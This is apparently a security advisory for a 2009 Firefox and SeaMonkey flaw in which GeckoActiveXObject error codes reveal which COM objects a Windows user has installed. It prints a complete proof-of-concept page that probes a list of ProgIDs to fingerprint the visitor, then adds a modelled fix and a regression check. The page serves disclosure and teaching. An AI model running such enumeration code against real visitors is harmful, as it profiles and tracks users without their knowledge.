Affected versions:
Mozilla Firefox 3.5.x
Mozilla Firefox 3.0.x
Mozilla SeaMonkey 2.0
Vulnerability description:
Firefox is a popular open-source web browser.
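The exception message generated by Mozilla's GeckoActiveXObject differs depending on whether the ProgID of the requested COM object exists in the system registry. A malicious site can use this difference to enumerate the COM objects installed on the user's system and build a profile that tracks the user across browsing sessions.
<*References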
http://www.mozilla.org/security/announce/2009/mfsa2009-71.html
https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=503451
http://secunia.com/advisories/37699/
*>
Test method:
The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<!--
  Copyright (c) 2009, Gregory Fleischer (gfleischer@gmail.com)
  License: Revised BSD
-->
<head>
<title>COM Enumeration using GeckoActiveXObject</title>
<script type="text/javascript">//<![CDATA[
var matches = [];
// The first entry is a nonsense ProgID used as a control that should never match.
var progIDs = [
  "akadlkasdlfkj.akadlkasdlfkj",
  "MSXML2.DOMDocument", "MSXML2.DOMDocument.2.0", "MSXML2.DOMDocument.3.0",
  "MSXML2.DOMDocument.4.0", "MSXML2.DOMDocument.5.0", "MSXML2.DOMDocument.6.0",
  "Word.Document.6", "Word.Document.8", "Word.Document.10", "Word.Document.12",
  "QuickTime.QuickTime", "QuickTime.QuickTime.9",
  "RealPlayer.HWEventHandler",
  "JavaPlugin", "JavaPlugin.FamilyVersionSupport",
  "JavaPlugin.160_12", "JavaPlugin.160_13", "JavaPlugin.160_14",
  "ShockwaveFlash.ShockwaveFlash", "ShockwaveFlash.ShockwaveFlash.11",
  "ShockwaveFlash.ShockwaveFlash.10", "ShockwaveFlash.ShockwaveFlash.9",
  "ShockwaveFlash.ShockwaveFlash.6",
];

function check_object(progID) {
  try {
    var obj = new GeckoActiveXObject(progID);
  } catch (e) {
    var err = e.toString();
    // 80004005: ProgID is registered; 800401f3: ProgID is not registered.
    if (err.match(/COM\s*Error\s*Result\s*=\s*80004005/i)) {
      matches.push(progID);
    } else if (!err.match(/COM\s*Error\s*Result\s*=\s*800401f3/i)) {
      alert("unexpected response: " + e);
    }
  }
}

function test() {
  matches = [];
  if ("undefined" == typeof(window.GeckoActiveXObject)) {
    alert("GeckoActiveXObject only supported on Windows");
  } else {
    for (var i = 0; i < progIDs.length; ++i) {
      check_object(progIDs[i]);
    }
  }
  if (matches.length > 0) {
    if (matches.length == progIDs.length) {
      alert("matched everything? that's unlikely");
    } else {
      alert("matched: " + matches.join(", "));
    }
  } else {
    alert("no matches detected");
  }
}

function init() {
}
//]]>
</script>
</head>
<body onload="init();">
GeckoActiveXObject exceptions:
<ul>
<li>COM object not installed: COM Error Result = 800401f3</li>
<li>COM object installed: COM Error Result = 80004005</li>
</ul>
<input type="button" name="run test" value="run test" onclick="test()"/>
</body>
</html>
<!-- Keep this comment at the end of the file
Local variables:
mode:xml-html
sgml-declaration:"~/lib/DTD/xhtml1/xhtml1.dcl"
sgml-default-dtd-file:"~/lib/DTD/xhtml1/xhtml1-transitional.ced"
End:
-->
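Security recommendations:
Vendor patch:
Mozilla
-------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:
http://www.mozilla.org/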
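
The error-message difference from the vulnerability description, modelled as an added example (not code from Mozilla or from the original page): `createLeaky` reproduces the two error results the page lists, `createUniform` surfaces one fixed error that carries no install state, and `leaksInstallState` is a regression check for the difference. `REGISTRY`, the fixed error text and all function names are assumptions constructed for illustration.

```javascript
// Constructed stand-in for the ProgIDs registered on a host (sample data).
const REGISTRY = new Set(["MSXML2.DOMDocument", "Word.Document.12"]);

const E_FAIL = "80004005";            // page: "COM object installed"
const CO_E_CLASSSTRING = "800401f3";  // page: "COM object not installed"

// Leaky behaviour from the advisory: creation is refused either way, but
// the error text reveals whether the ProgID exists in the registry.
function createLeaky(progID) {
  const code = REGISTRY.has(progID) ? E_FAIL : CO_E_CLASSSTRING;
  throw new Error("COM Error Result = " + code);
}

// Hardened form (hypothetical): the detailed result stays on the trusted
// side and untrusted script only ever sees one fixed message.
function createUniform(progID) {
  let detail = null;
  try {
    createLeaky(progID);
  } catch (e) {
    detail = String(e); // would go to an internal log, never to content
  }
  void detail;
  throw new Error("COM object creation denied");
}

// Returns the error text that page script would observe for one ProgID.
function errorText(factory, progID) {
  try {
    factory(progID);
    return "created";
  } catch (e) {
    return String(e);
  }
}

// Regression check: true if the observable result differs between a
// registered and an unregistered ProgID, i.e. the factory is an oracle.
function leaksInstallState(factory, installedID, missingID) {
  return errorText(factory, installedID) !== errorText(factory, missingID);
}
```

A uniform message removes only the signal this page describes; a check like `leaksInstallState` compares error text and says nothing about other observable differences such as timing.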